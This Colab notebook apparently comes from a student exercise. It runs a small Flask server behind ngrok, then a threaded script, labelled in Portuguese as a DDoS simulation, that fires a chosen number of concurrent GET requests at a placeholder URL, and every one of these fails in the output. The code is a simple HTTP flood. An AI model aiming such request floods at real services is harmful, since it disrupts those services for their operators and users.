{
  "nbformat": 4,
  "nbformat_minor": 0,
  "metadata": {
    "colab": {
      "provenance": [],
      "authorship_tag": "ABX9TyMd/fJk8LcpUdhFCpn8yK9G",
      "include_colab_link": true
    },
    "kernelspec": {
      "name": "python3",
      "display_name": "Python 3"
    },
    "language_info": {
      "name": "python"
    }
  },
  "cells": [
    {
      "cell_type": "markdown",
      "metadata": {
        "id": "view-in-github",
        "colab_type": "text"
      },
      "source": [
        "<a href=\"https://colab.research.google.com/github/Gabrielcsd/Ataque-DDOS1/blob/main/Untitled.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>"
      ]
    },
    {
      "cell_type": "code",
      "execution_count": 1,
      "metadata": {
        "colab": {
          "base_uri": "https://localhost:8080/"
        },
        "id": "kvAKFlv0YWQf",
        "outputId": "e2a59055-66da-4b52-f61a-02ace9927b96"
      },
      "outputs": [
        {
          "output_type": "stream",
          "name": "stdout",
          "text": [
            "Requirement already satisfied: flask in /usr/local/lib/python3.10/dist-packages (3.0.3)\n",
            "Collecting flask-ngrok\n",
            "  Downloading flask_ngrok-0.0.25-py3-none-any.whl.metadata (1.8 kB)\n",
            "Requirement already satisfied: Werkzeug>=3.0.0 in /usr/local/lib/python3.10/dist-packages (from flask) (3.1.3)\n",
            "Requirement already satisfied: Jinja2>=3.1.2 in /usr/local/lib/python3.10/dist-packages (from flask) (3.1.4)\n",
            "Requirement already satisfied: itsdangerous>=2.1.2 in /usr/local/lib/python3.10/dist-packages (from flask) (2.2.0)\n",
            "Requirement already satisfied: click>=8.1.3 in /usr/local/lib/python3.10/dist-packages (from flask) (8.1.7)\n",
            "Requirement already satisfied: blinker>=1.6.2 in /usr/local/lib/python3.10/dist-packages (from flask) (1.9.0)\n",
            "Requirement already satisfied: requests in /usr/local/lib/python3.10/dist-packages (from flask-ngrok) (2.32.3)\n",
            "Requirement already satisfied: MarkupSafe>=2.0 in /usr/local/lib/python3.10/dist-packages (from Jinja2>=3.1.2->flask) (3.0.2)\n",
            "Requirement already satisfied: charset-normalizer<4,>=2 in /usr/local/lib/python3.10/dist-packages (from requests->flask-ngrok) (3.4.0)\n",
            "Requirement already satisfied: idna<4,>=2.5 in /usr/local/lib/python3.10/dist-packages (from requests->flask-ngrok) (3.10)\n",
            "Requirement already satisfied: urllib3<3,>=1.21.1 in /usr/local/lib/python3.10/dist-packages (from requests->flask-ngrok) (2.2.3)\n",
            "Requirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.10/dist-packages (from requests->flask-ngrok) (2024.8.30)\n",
            "Downloading flask_ngrok-0.0.25-py3-none-any.whl (3.1 kB)\n",
            "Installing collected packages: flask-ngrok\n",
            "Successfully installed flask-ngrok-0.0.25\n"
          ]
        }
      ],
      "source": [
        "!pip install flask flask-ngrok\n",
        "\n"
      ]
    },
    {
      "cell_type": "code",
      "source": [
        "from flask import Flask\n",
        "import time\n",
        "from flask_ngrok import run_with_ngrok\n",
        "\n",
        "app = Flask(__name__)\n",
        "\n",
        "@app.route('/')\n",
        "def home():\n",
        "    # Simula um pequeno atraso para representar o processamento do servidor\n",
        "    time.sleep(0.1)\n",
        "    return \"Servidor ativo\"\n",
        "\n",
        "# Inicializando o ngrok para rodar o Flask\n",
        "run_with_ngrok(app)\n",
        "\n",
        "if __name__ == '__main__':\n",
        "    app.run()\n",
        "\n"
      ],
      "metadata": {
        "colab": {
          "base_uri": "https://localhost:8080/"
        },
        "id": "bNQQofDpbWRv",
        "outputId": "a89919b9-4231-4b98-c0bc-b2b9bbdddd84"
      },
      "execution_count": 2,
      "outputs": [
        {
          "output_type": "stream",
          "name": "stdout",
          "text": [
            " * Serving Flask app '__main__'\n",
            " * Debug mode: off\n"
          ]
        },
        {
          "output_type": "stream",
          "name": "stderr",
          "text": [
            "INFO:werkzeug:\u001b[31m\u001b[1mWARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.\u001b[0m\n",
            " * Running on http://127.0.0.1:5000\n",
            "INFO:werkzeug:\u001b[33mPress CTRL+C to quit\u001b[0m\n",
            "Exception in thread Thread-10:\n",
            "Traceback (most recent call last):\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/urllib3/connection.py\", line 199, in _new_conn\n",
            "    sock = connection.create_connection(\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/urllib3/util/connection.py\", line 85, in create_connection\n",
            "    raise err\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/urllib3/util/connection.py\", line 73, in create_connection\n",
            "    sock.connect(sa)\n",
            "ConnectionRefusedError: [Errno 111] Connection refused\n",
            "\n",
            "The above exception was the direct cause of the following exception:\n",
            "\n",
            "Traceback (most recent call last):\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/urllib3/connectionpool.py\", line 789, in urlopen\n",
            "    response = self._make_request(\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/urllib3/connectionpool.py\", line 495, in _make_request\n",
            "    conn.request(\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/urllib3/connection.py\", line 441, in request\n",
            "    self.endheaders()\n",
            "  File \"/usr/lib/python3.10/http/client.py\", line 1278, in endheaders\n",
            "    self._send_output(message_body, encode_chunked=encode_chunked)\n",
            "  File \"/usr/lib/python3.10/http/client.py\", line 1038, in _send_output\n",
            "    self.send(msg)\n",
            "  File \"/usr/lib/python3.10/http/client.py\", line 976, in send\n",
            "    self.connect()\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/urllib3/connection.py\", line 279, in connect\n",
            "    self.sock = self._new_conn()\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/urllib3/connection.py\", line 214, in _new_conn\n",
            "    raise NewConnectionError(\n",
            "urllib3.exceptions.NewConnectionError: <urllib3.connection.HTTPConnection object at 0x7c14885310c0>: Failed to establish a new connection: [Errno 111] Connection refused\n",
            "\n",
            "The above exception was the direct cause of the following exception:\n",
            "\n",
            "Traceback (most recent call last):\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/requests/adapters.py\", line 667, in send\n",
            "    resp = conn.urlopen(\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/urllib3/connectionpool.py\", line 843, in urlopen\n",
            "    retries = retries.increment(\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/urllib3/util/retry.py\", line 519, in increment\n",
            "    raise MaxRetryError(_pool, url, reason) from reason  # type: ignore[arg-type]\n",
            "urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='localhost', port=4040): Max retries exceeded with url: /api/tunnels (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7c14885310c0>: Failed to establish a new connection: [Errno 111] Connection refused'))\n",
            "\n",
            "During handling of the above exception, another exception occurred:\n",
            "\n",
            "Traceback (most recent call last):\n",
            "  File \"/usr/lib/python3.10/threading.py\", line 1016, in _bootstrap_inner\n",
            "    self.run()\n",
            "  File \"/usr/lib/python3.10/threading.py\", line 1378, in run\n",
            "    self.function(*self.args, **self.kwargs)\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/flask_ngrok.py\", line 70, in start_ngrok\n",
            "    ngrok_address = _run_ngrok()\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/flask_ngrok.py\", line 35, in _run_ngrok\n",
            "    tunnel_url = requests.get(localhost_url).text  # Get the tunnel information\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/requests/api.py\", line 73, in get\n",
            "    return request(\"get\", url, params=params, **kwargs)\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/requests/api.py\", line 59, in request\n",
            "    return session.request(method=method, url=url, **kwargs)\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/requests/sessions.py\", line 589, in request\n",
            "    resp = self.send(prep, **send_kwargs)\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/requests/sessions.py\", line 703, in send\n",
            "    r = adapter.send(request, **kwargs)\n",
            "  File \"/usr/local/lib/python3.10/dist-packages/requests/adapters.py\", line 700, in send\n",
            "    raise ConnectionError(e, request=request)\n",
            "requests.exceptions.ConnectionError: HTTPConnectionPool(host='localhost', port=4040): Max retries exceeded with url: /api/tunnels (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7c14885310c0>: Failed to establish a new connection: [Errno 111] Connection refused'))\n"
          ]
        }
      ]
    },
    {
      "cell_type": "code",
      "source": [
        "!pip install requests\n"
      ],
      "metadata": {
        "colab": {
          "base_uri": "https://localhost:8080/"
        },
        "id": "e3KkYpTTb1Z0",
        "outputId": "ff07c9f5-6452-45e3-ecc4-31295e55e80d"
      },
      "execution_count": 3,
      "outputs": [
        {
          "output_type": "stream",
          "name": "stdout",
          "text": [
            "Requirement already satisfied: requests in /usr/local/lib/python3.10/dist-packages (2.32.3)\n",
            "Requirement already satisfied: charset-normalizer<4,>=2 in /usr/local/lib/python3.10/dist-packages (from requests) (3.4.0)\n",
            "Requirement already satisfied: idna<4,>=2.5 in /usr/local/lib/python3.10/dist-packages (from requests) (3.10)\n",
            "Requirement already satisfied: urllib3<3,>=1.21.1 in /usr/local/lib/python3.10/dist-packages (from requests) (2.2.3)\n",
            "Requirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.10/dist-packages (from requests) (2024.8.30)\n"
          ]
        }
      ]
    },
    {
      "cell_type": "code",
      "source": [
        "import requests\n",
        "import threading\n",
        "\n",
        "# Função para realizar uma requisição ao servidor\n",
        "def make_request():\n",
        "    try:\n",
        "        # Substitua pelo link do seu servidor Flask exposto via ngrok\n",
        "        url = \"http://<id>.ngrok.io\"  # Insira o link gerado pelo ngrok\n",
        "        response = requests.get(url)\n",
        "        print(response.text)\n",
        "    except requests.exceptions.RequestException as e:\n",
        "        print(\"Falha na conexão:\", e)\n",
        "\n",
        "# Função para simular um ataque DDoS com múltiplas requisições simultâneas\n",
        "def simulate_ddos(threads):\n",
        "    thread_list = []\n",
        "    for _ in range(threads):\n",
        "        thread = threading.Thread(target=make_request)\n",
        "        thread_list.append(thread)\n",
        "        thread.start()\n",
        "\n",
        "    # Aguarda que todas as threads terminem\n",
        "    for thread in thread_list:\n",
        "        thread.join()\n",
        "\n",
        "# Solicita o número de requisições simuladas ao usuário\n",
        "num_requests = int(input(\"Digite o número de requisições para simular o ataque DDoS: \"))\n",
        "simulate_ddos(num_requests)\n",
        "]"
      ],
      "metadata": {
        "colab": {
          "base_uri": "https://localhost:8080/"
        },
        "id": "eJjzZq_ocCf1",
        "outputId": "80dee619-b6c6-4479-8b93-ee64f8922e8c"
      },
      "execution_count": 7,
      "outputs": [
        {
          "output_type": "stream",
          "name": "stdout",
          "text": [
            "Digite o número de requisições para simular o ataque DDoS: 150\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885c94b0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885cb3a0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885c8e20>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885caf20>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1489e14ee0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "\n",
            "Falha na conexão:Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488432aa0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488433c10>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1489e175e0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            " Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885c9f60>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885c9840>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885c8040>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488432320>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885cb8b0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885c80d0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885c8760>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488433070>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488430220>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1489e159f0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488433d60>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885c8ca0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488432c20>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488445390>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885cb8b0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488432e90>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488430b50>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488432380>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884473d0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884327d0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488432320>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: Falha na conexão:Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488445c90>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885cb070>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\")) HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488447b80>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884470d0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488445db0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488431960>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488447550>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488446e00>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488447340>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488433eb0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488445720>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884453f0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488445d80>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884458d0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488445480>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488446980>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488444d30>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1489e17f10>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488446920>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884450f0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488444dc0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488533e20>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1489e17eb0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885cb430>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884470a0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488446a70>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14884448b0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488446920>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488447580>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488445b10>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885cb3a0>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488430160>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c14885c8370>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488446140>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488447070>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488445840>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
            "Falha na conexão: HTTPConnectionPool(host='%3cid%3e.ngrok.io', port=80): Max retries exceeded with url: / (Caused by NameResolutionError(\"<urllib3.connection.HTTPConnection object at 0x7c1488433c10>: Failed to resolve '%3cid%3e.ngrok.io' ([Errno -2] Name or service not known)\"))\n",
